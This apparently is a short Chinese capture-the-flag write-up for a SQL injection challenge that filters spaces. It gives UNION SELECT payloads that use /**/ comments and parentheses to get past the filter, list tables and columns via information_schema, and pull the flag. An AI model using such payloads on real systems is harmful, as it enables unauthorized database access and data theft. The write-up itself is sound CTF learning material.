这道题目空格被过滤了,那么我们可以用/**/来替换空格
'union/**/select/**/1,(select/**/database()),3# //查看数据库名名字为web2
查看web2下的表名
'union/**/select/**/1,(select/**/group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema='web2'/**/),3#
查看flag表下的所有字段也就是所有列名
'union/**/select/**/1,(select/**/group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_schema='web2'/**/),3#
查看flag表下的flag列的所有内容拿到flag
'union/**/select/**/1,(select/**/group_concat(flag)/**/from/**/flag),3#
当然绕过空格的方式还有很多种
比如用 () 来绕过
'union(select(1),(select(group_concat(flag))from(flag)),3)#
或者用%0a来绕过